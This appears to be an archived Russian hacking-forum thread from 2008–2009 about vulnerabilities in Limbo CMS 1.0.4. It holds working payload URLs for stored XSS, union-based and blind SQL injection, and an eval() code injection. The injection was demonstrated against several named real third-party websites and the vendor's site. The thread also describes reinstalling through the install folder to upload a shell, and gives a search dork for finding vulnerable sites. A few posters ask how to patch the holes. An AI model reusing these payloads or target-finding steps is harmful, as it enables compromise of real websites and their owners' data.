Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Уязвимости в Limbo CMS (https://forum.antichat.xyz/showthread.php?t=66899)

Ershik 10.04.2008 10:14

Уязвимости в Limbo CMS
 
Из-за недавний событий начал искать ошибки на сайте.
Запустил денвер, поставил версию Limbo 1.0.4 Rus 3 и пошел смотреть...

Множественные XSS
Честно говоря, Либма, это одна большая xss :)

Обратная связь
http://test1.ru/limba/index.php?option=contact&Itemid=3&PHPSESSID=1fa783 d6dc564bf45cc19f7ae0927250
Если в тело вписать скрипт "><script>alert()</script>
Он сработает, когда админ будет читать "обратную связь".

Форум
В тегах форум съедает "<script>", оставляя ">alert Можно в принципе зашифровать "<script>" и тогда xss сработает.
Логика, сам не проверял.

Чат
Никакой фильтрации в полях "текст.." и в "имя.." нет. Ситуация аналогична как и с обратной связью.
Добавление / редактирование объявлений (NewsFlash)
http://test1.ru/limba/admin.php?com_option=newsflash
Нет никакой фильтрации. "><script>alert()</script> спокойно проходит как в теле сообщения, отображаясь на главной странице, так и в самой администраторской.
Совершенно нет никакой фильтрации в модулях
http://test1.ru/limba/admin.php?com_option=modules&option=manage
Можно вписать скрипт вместо названии темы и он отобразится на главной странице и в админке.
Больше всего xss встречается в админке, практический в каждом приложении она присутствует.

Sql-injechion (?)
http://test1.ru/limba/index.php?option=lurm&sec=gallery&Itemid=49'
http://test1.ru/limba/index.php?option=lurm&sec=gallery&Itemid=49+order+ by+5/*
http://test1.ru/limba/index.php?option=lurm&sec=gallery&Itemid=49+union+ select+1,2,3,4,5/*
Этой баге подвержены: почти все модули на главной странице
Что странно, поля находяться, но нет вывода информации на экран, ИМХО надо писать эксплоит, чтобы ею воспользоваться.


раскрытие пути
Существует, правда, при установке движка, если админ дятел и не удалил папку "install"
http://test1.ru/limba/install/index.php?stage=0

http://test1.ru/limba/install/index.php?stage=sfsdfsdf


Warning: main(installsdsaf.php): failed to open stream: No such file or directory in z:\home\test1.ru\www\limba\install\index.php on line 51

Цитата:

Warning: main(): Failed opening 'installsdsaf.php' for inclusion (include_path='.;/usr/local/php/PEAR') in z:\home\test1.ru\www\limba\install\index.php on line 51
Похоже на инклуд, но он будет не нужет, если сможем установить лимбу, а из админки спокойно залить шелл через шаблоны.

Кстати, можно перескочить.
http://test1.ru/limba/install/index.php?stage=0 заменяем на
http://test1.ru/limba/install/index.php?stage=1 если прав не хватает, и устанавливаем систему.

А теперь вопрос к вам, уважаемые Античатовцы.
От всего спасает штассер, но может ли кто нибудь подсказать, как закрыть эти дыры? Найти было не проблема, сложнее для меня закрыть их(есть сайт на этом движке). Заметил попытки взлома и стал искать дыры, чере которые могли проникнуть.

HAXTA4OK 07.10.2009 17:44

сорр за археологию, но заново создавать не оч охото

Limbo - Lite Mambo 1.0.4
SQL

Код:

index.php?option=weblinks&catid=[SQL]&Itemid=209

Result : index.php?option=weblinks&catid=78+union+select+1, 2,3,4,5,6,7,8,9,10--&Itemid=209

Код:

index.php?option=content&pcontent=1&task=view&id=[blind SQL]&Itemid=194


Limbo - Lite Mambo 1.0.4.2RE3
SQL
Код:

index.php?option=content&task=view&id=[blind SQL]

Код:

index.php?option=weblinks&Itemid=[blind SQL]

l1ght 26.11.2009 19:00

в 1.0.4 RE3, eval();
Цитата:

http://developinternet.ru/?option=lurm&no_html=0&secid=phpinfo();&id=1&fld=u sr_image&task=showimg
http://1-fish.ru/?option=lurm&no_html=0&secid=phpinfo();&id=1&fld=u sr_image&task=showimg
http://www.gim5cheb.ru/index.php?option=lurm&no_html=0&secid=phpinfo();&i d=1&fld=usr_image&task=showimg
...
в 1.0.4 RE4 уже bsql, производитель:
Цитата:

http://limbo-cms.net.ru/index2.php?option=lurm&no_html=0&secid=7+order+by+ 1--+1
Код:

inurl:option=lurm

Nightmarе 26.11.2009 19:17

Цитата:

Сообщение от l1ght
в 1.0.4 RE3, lol();

в 1.0.4 RE4 уже bsql, производитель:

Код:

inurl:option=lurm

большое спс за уязвимость, можно ли вопрос как её закрыть?

zythar 26.11.2009 19:23

добавить фильтрацию на параметр secid?

Nightmarе 26.11.2009 19:31

а в каком он файле лежит? просто неохота ставить себе двиг и ковырять


Время: 15:32